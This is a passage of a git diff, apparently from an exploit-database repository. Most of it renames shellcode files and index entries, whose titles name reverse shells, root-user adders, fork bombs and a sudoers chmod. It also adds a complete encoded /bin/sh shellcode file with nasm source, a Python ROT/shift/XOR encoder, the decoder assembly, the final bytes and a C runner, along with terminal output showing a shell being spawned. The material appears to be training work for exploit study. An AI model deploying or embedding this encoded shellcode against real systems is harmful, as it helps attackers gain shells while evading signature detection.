bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 +43558,shellcodes/linux_x86-64/43558.asm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64 +43559,shellcodes/linux_x86-64/43559.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64 +43561,shellcodes/linux_x86-64/43561.asm,"Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64 41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86 41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86 41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86 43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86 -41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64 +41750,shellcodes/linux_x86-64/41750.asm,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64 41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)",2017-03-29,WangYihang,shellcode,linux_x86 -41827,shellcodes/windows_x86-64/41827.txt,"Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64 -41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64 +41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64 +41883,shellcodes/linux_x86-64/41883.txt,"Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64 41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86 41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86 -41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64 -42016,shellcodes/windows/42016.asm,"Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows -42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64 +41970,shellcodes/linux_x86-64/41970.asm,"Linux/x64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64 +42016,shellcodes/windows/42016.asm,"Windows - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows +42126,shellcodes/linux_x86-64/42126.c,"Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64 42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86 -42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64 +42179,shellcodes/linux_x86-64/42179.c,"Linux/x64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64 42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86 42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86 -42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64 +42339,shellcodes/linux_x86-64/42339.c,"Linux/x64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64 42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86 -42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64 -42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 -42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 +42485,shellcodes/linux_x86-64/42485.c,"Linux/x64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64 +42522,shellcodes/linux_x86-64/42522.c,"Linux/x64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 +42523,shellcodes/linux_x86-64/42523.c,"Linux/x64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 42594,shellcodes/linux_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,linux_x86 42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm 42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm -42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64 +42791,shellcodes/linux_x86-64/42791.c,"Linux/x64 - mkdir(evil) Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64 42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86 -42992,shellcodes/windows_x86-64/42992.c,"Windows/x86-64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +42992,shellcodes/windows_x86-64/42992.c,"Windows/x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86 diff --git a/shellcodes/arm/14113.txt b/shellcodes/arm/14113.c similarity index 100% rename from shellcodes/arm/14113.txt rename to shellcodes/arm/14113.c diff --git a/shellcodes/arm/14116.txt b/shellcodes/arm/14116.c similarity index 100% rename from shellcodes/arm/14116.txt rename to shellcodes/arm/14116.c diff --git a/shellcodes/arm/14122.txt b/shellcodes/arm/14122.c similarity index 100% rename from shellcodes/arm/14122.txt rename to shellcodes/arm/14122.c diff --git a/shellcodes/generator/36411.txt b/shellcodes/generator/36411.py old mode 100644 new mode 100755 similarity index 100% rename from shellcodes/generator/36411.txt rename to shellcodes/generator/36411.py diff --git a/shellcodes/linux_x86-64/13915.txt b/shellcodes/linux_x86-64/13915.c similarity index 100% rename from shellcodes/linux_x86-64/13915.txt rename to shellcodes/linux_x86-64/13915.c diff --git a/shellcodes/linux_x86-64/35205.txt b/shellcodes/linux_x86-64/35205.asm similarity index 100% rename from shellcodes/linux_x86-64/35205.txt rename to shellcodes/linux_x86-64/35205.asm diff --git a/shellcodes/linux_x86-64/40122.txt b/shellcodes/linux_x86-64/40122.c similarity index 100% rename from shellcodes/linux_x86-64/40122.txt rename to shellcodes/linux_x86-64/40122.c diff --git a/shellcodes/linux_x86-64/41750.txt b/shellcodes/linux_x86-64/41750.asm similarity index 100% rename from shellcodes/linux_x86-64/41750.txt rename to shellcodes/linux_x86-64/41750.asm diff --git a/shellcodes/linux_x86/13424.txt b/shellcodes/linux_x86/13424.c similarity index 100% rename from shellcodes/linux_x86/13424.txt rename to shellcodes/linux_x86/13424.c diff --git a/shellcodes/linux_x86/13578.txt b/shellcodes/linux_x86/13578.asm similarity index 100% rename from shellcodes/linux_x86/13578.txt rename to shellcodes/linux_x86/13578.asm diff --git a/shellcodes/linux_x86/13586.txt b/shellcodes/linux_x86/13586.asm similarity index 100% rename from shellcodes/linux_x86/13586.txt rename to shellcodes/linux_x86/13586.asm diff --git a/shellcodes/linux_x86/13599.txt b/shellcodes/linux_x86/13599.c similarity index 100% rename from shellcodes/linux_x86/13599.txt rename to shellcodes/linux_x86/13599.c diff --git a/shellcodes/linux_x86/13600.txt b/shellcodes/linux_x86/13600.c similarity index 100% rename from shellcodes/linux_x86/13600.txt rename to shellcodes/linux_x86/13600.c diff --git a/shellcodes/linux_x86/13601.txt b/shellcodes/linux_x86/13601.c similarity index 100% rename from shellcodes/linux_x86/13601.txt rename to shellcodes/linux_x86/13601.c diff --git a/shellcodes/linux_x86/13602.txt b/shellcodes/linux_x86/13602.c similarity index 100% rename from shellcodes/linux_x86/13602.txt rename to shellcodes/linux_x86/13602.c diff --git a/shellcodes/linux_x86/13703.txt b/shellcodes/linux_x86/13703.c similarity index 100% rename from shellcodes/linux_x86/13703.txt rename to shellcodes/linux_x86/13703.c diff --git a/shellcodes/linux_x86/13725.txt b/shellcodes/linux_x86/13725.c similarity index 100% rename from shellcodes/linux_x86/13725.txt rename to shellcodes/linux_x86/13725.c diff --git a/shellcodes/linux_x86/13726.txt b/shellcodes/linux_x86/13726.c similarity index 100% rename from shellcodes/linux_x86/13726.txt rename to shellcodes/linux_x86/13726.c diff --git a/shellcodes/linux_x86/17194.txt b/shellcodes/linux_x86/17194.c similarity index 100% rename from shellcodes/linux_x86/17194.txt rename to shellcodes/linux_x86/17194.c diff --git a/shellcodes/linux_x86/35519.txt b/shellcodes/linux_x86/35519.c similarity index 100% rename from shellcodes/linux_x86/35519.txt rename to shellcodes/linux_x86/35519.c diff --git a/shellcodes/linux_x86/43890.c b/shellcodes/linux_x86/43890.c new file mode 100644 index 000000000..3c51a2b56 --- /dev/null +++ b/shellcodes/linux_x86/43890.c @@ -0,0 +1,172 @@ +/* + +#################################### Description #################################### + +; Title : [ROT-N + Shift-N + XOR-N] encoded /bin/sh - Shellcode +; Author : Hashim Jawad +; Blog Post : https://ihack4falafel.com/2018/01/rot-n-shift-n-xor-n-shellcode-encoder-linux-x86/ +; Twitter : @ihack4falafel +; SLAE ID : SLAE-1115 +; Purpose : spawn /bin/sh shell +; Tested On : Ubuntu 12.04.5 LTS +; Arch : x86 +; Size : 77 bytes + +##################################### sh.nasm ###################################### + +global _start + +section .text + +_start: + ; + ; execve() code block + ; + xor eax,eax ; initiliaze EAX + push eax ; push null terminator + push 0x68732f2f ; push /bin//sh + push 0x6e69622f + xchg ebx,esp ; save stack pointer to EBX + mov al,0xb ; __NR_execve 11 + int 0x80 ; ping kernel! + +############################# Original Shellcode #################################### + +ihack4falafel@ubuntu:~$ nasm -f elf32 -o sh.o sh.nasm +ihack4falafel@ubuntu:~$ ld -z execstack -o sh sh.o +ihack4falafel@ubuntu:~$ objdump -d ./sh|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80" + +################################# Encoder.py ##################################### + +#!/usr/bin/python + +import sys + +# Colors +#---------------#---------# +W = '\033[0m' # White # +P = '\033[35m' # Purple # +Y = '\033[33m' # Yellow # +#---------------#---------# + +# Check ROT, SHL, and XOR input, otherwise print usage, example, and important notes! +if len(sys.argv) < 4: + print Y+ "Usage :" + P+ " python Encoder.py " +W + print Y+ "Example :" + P+ " python Encoder.py 13 1 1337 " +W + print Y+ "Notes :" + P+ " 1) Make sure to update Decoder.nasm with input values. " +W + print " " + P+ " 2) Due to encoded_shellcode size (word) in Decoder.nasm, shift operatio" +W + print " " + P+ " n is limited to <1-8> bits. Feel free to upgrade size to DW to allow" +W + print " " + P+ " up to 16-bits shift operation. " +W + print " " + P+ " 3) Encoder.py currently include /bin/sh shellcode as proof of concept. " +W + print " " + P+ " Make sure to change it to your desired shellcode. " +W + sys.exit(0) + +ROT = int(sys.argv[1]) +nbits = int(sys.argv[2]) +XOR = int(sys.argv[3]) + +# initial values +shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80") # paste your shellcode here +XOR_HEX = hex(XOR) # Encoded shellcode terminator +encoded_shellcode = "" +original_shellcode = "" + +# Orginal shellcode formatted +for x in bytearray(shellcode): + original_shellcode += '0x' + original_shellcode += '%02x, ' %x + +# [ROT-N + SHL-N + XOR-N] encoded shellcode formatted +for y in bytearray(shellcode): + byte = (y + ROT)%256 #|-->ROT-N + byte = byte << nbits #########|-->SHL-N + byte = byte ^ XOR #################|-->XOR-N + encoded_shellcode += '0x' + encoded_shellcode += '%02x, ' %byte + +# print original and encoded shellcode +print Y+ "Original Shellcode: " + P+ original_shellcode +W +print Y+ "Encoded Shellcode : " + P+ encoded_shellcode + Y+ XOR_HEX +W + +#################################### Encoded Shellcode ########################################## + +ihack4falafel@ubuntu:~$ python Encoder.py 13 1 1337 +Original Shellcode: 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x87, 0xdc, 0xb0, 0x0b, 0xcd, 0x80, +Encoded Shellcode : 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539 +ihack4falafel@ubuntu:~$ + +#################################### Decoder.nasm ############################################### + +global _start + +section .text + +_start: + ; + ; [ROT-N + SHL-N + XOR-N] encoded execve() code block + ; + jmp short call_decoder ; jump to call_decoder to save encoded_shellcode pointer to ESI + +decoder: + + pop esi ; store encoded_shellcode pointer in ESI + push esi ; push encoded_shellcode pointer to stack for later execution + mov edi, esi ; move encoded_shellcode pointer to EDI + +decode: + ; + ; note: 1) Make sure ROT, SHR, and XOR here match your encoder.py input. + ; 2) Hence we're limited by the size of encoded_shellcode (word), + ; SHR is limited to <1-8> bits. Feel free to upgrade size to DW + ; to allow up to 16-bits shift if need be. + ; + mov ax, [esi] ; move current word from encoded_shellcode to AX + xor ax, 0x539 ; XOR encoded_shellcode with 1337, one word at a time + jz decoded_shellcode ; if zero jump to decoded_shellcode + shr ax, 1 ; shift encoded_shellcode to right by one bit, one word at a time + sub ax, 13 ; substract 13 from encoded_shellcode, one word at a time + mov [edi], al ; move decoded byte to EDI + inc esi ; point to the next encoded_shellcode word + inc esi + inc edi ; point to the next decoded_shellcode byte + jmp short decode ; jump to decode and repeat the decoding process for the next word! + +decoded_shellcode: + call [esp] ; execute decoded_shellcode + +call_decoder: + call decoder + encoded_shellcode: dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539 + +######################################### Final Shellcode ########################################### + +ihack4falafel@ubuntu:~# nasm -f elf32 -o Decoder.o Decoder.nasm +ihack4falafel@ubuntu:~# ld -z execstack -o Decoder Decoder.o +ihack4falafel@ubuntu:~# objdump -d ./Decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' +"\xeb\x1e\x5e\x56\x89\xf7\x66\x8b\x06\x66\x35\x39\x05\x74\x0e\x66\xd1\xe8\x66\x83\xe8\x0d\x88\x07\x46\x46\x47\xeb\xe9\xff\x14\x24\xe8\xdd\xff\xff\xff\x45\x05\xa3\x04\x83\x05\xd3\x05\x41\x05\x41\x05\x39\x04\xd3\x05\xd3\x05\x41\x05\xe7\x05\xd5\x05\xcf\x05\x11\x04\xeb\x04\x43\x04\x09\x05\x8d\x04\x23\x04\x39\x05" +ihack4falafel@ubuntu:~# gcc -fno-stack-protector -z execstack sh.c -o sh +ihack4falafel@ubuntu:~$ ./sh +Shellcode Length: 77 +$ whoami +ihack4falafel +$ + +*/ + +#include +#include + +unsigned char code[] = \ +"\xeb\x1e\x5e\x56\x89\xf7\x66\x8b\x06\x66\x35\x39\x05\x74\x0e\x66\xd1\xe8\x66\x83\xe8\x0d\x88\x07\x46\x46\x47\xeb\xe9\xff\x14\x24\xe8\xdd\xff\xff\xff\x45\x05\xa3\x04\x83\x05\xd3\x05\x41\x05\x41\x05\x39\x04\xd3\x05\xd3\x05\x41\x05\xe7\x05\xd5\x05\xcf\x05\x11\x04\xeb\x04\x43\x04\x09\x05\x8d\x04\x23\x04\x39\x05"; + +void main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file diff --git a/shellcodes/netbsd_x86/13474.txt b/shellcodes/netbsd_x86/13474.c similarity index 100% rename from shellcodes/netbsd_x86/13474.txt rename to shellcodes/netbsd_x86/13474.c diff --git a/shellcodes/solaris_sparc/13494.txt b/shellcodes/solaris_sparc/13494.c similarity index 100% rename from shellcodes/solaris_sparc/13494.txt rename to shellcodes/solaris_sparc/13494.c diff --git a/shellcodes/solaris_sparc/13497.txt b/shellcodes/solaris_sparc/13497.c similarity index 100% rename from shellcodes/solaris_sparc/13497.txt rename to shellcodes/solaris_sparc/13497.c diff --git a/shellcodes/solaris_x86/13501.txt b/shellcodes/solaris_x86/13501.c similarity index 100% rename from shellcodes/solaris_x86/13501.txt rename to shellcodes/solaris_x86/13501.c diff --git a/shellcodes/solaris_x86/13502.txt b/shellcodes/solaris_x86/13502.c similarity index 100% rename from shellcodes/solaris_x86/13502.txt rename to shellcodes/solaris_x86/13502.c diff --git a/shellcodes/unixware/13503.txt b/shellcodes/unixware/13503.c similarity index 100% rename from shellcodes/unixware/13503.txt rename to shellcodes/unixware/13503.c diff --git a/shellcodes/windows/13649.txt b/shellcodes/windows/13649.as similarity index 100% rename from shellcodes/windows/13649.txt rename to shellcodes/windows/13649.as diff --git a/shellcodes/windows/33836.txt b/shellcodes/windows/33836.c similarity index 100% rename from shellcodes/windows/33836.txt rename to shellcodes/windows/33836.c diff --git a/shellcodes/windows_x86-64/13719.txt b/shellcodes/windows_x86-64/13719.c similarity index 100% rename from shellcodes/windows_x86-64/13719.txt rename to shellcodes/windows_x86-64/13719.c diff --git a/shellcodes/windows_x86-64/13729.txt b/shellcodes/windows_x86-64/13729.c similarity index 100% rename from shellcodes/windows_x86-64/13729.txt rename to shellcodes/windows_x86-64/13729.c diff --git a/shellcodes/windows_x86-64/41827.txt b/shellcodes/windows_x86-64/41827.asm similarity index 100% rename from shellcodes/windows_x86-64/41827.txt rename to shellcodes/windows_x86-64/41827.asm diff --git a/shellcodes/windows_x86/13635.txt b/shellcodes/windows_x86/13635.as similarity index 100% rename from shellcodes/windows_x86/13635.txt rename to shellcodes/windows_x86/13635.as diff --git a/shellcodes/windows_x86/13642.txt b/shellcodes/windows_x86/13642.asm similarity index 100% rename from shellcodes/windows_x86/13642.txt rename to shellcodes/windows_x86/13642.asm diff --git a/shellcodes/windows_x86/16283.txt b/shellcodes/windows_x86/16283.asm similarity index 100% rename from shellcodes/windows_x86/16283.txt rename to shellcodes/windows_x86/16283.asm diff --git a/shellcodes/windows_x86/17545.txt b/shellcodes/windows_x86/17545.c similarity index 100% rename from shellcodes/windows_x86/17545.txt rename to shellcodes/windows_x86/17545.c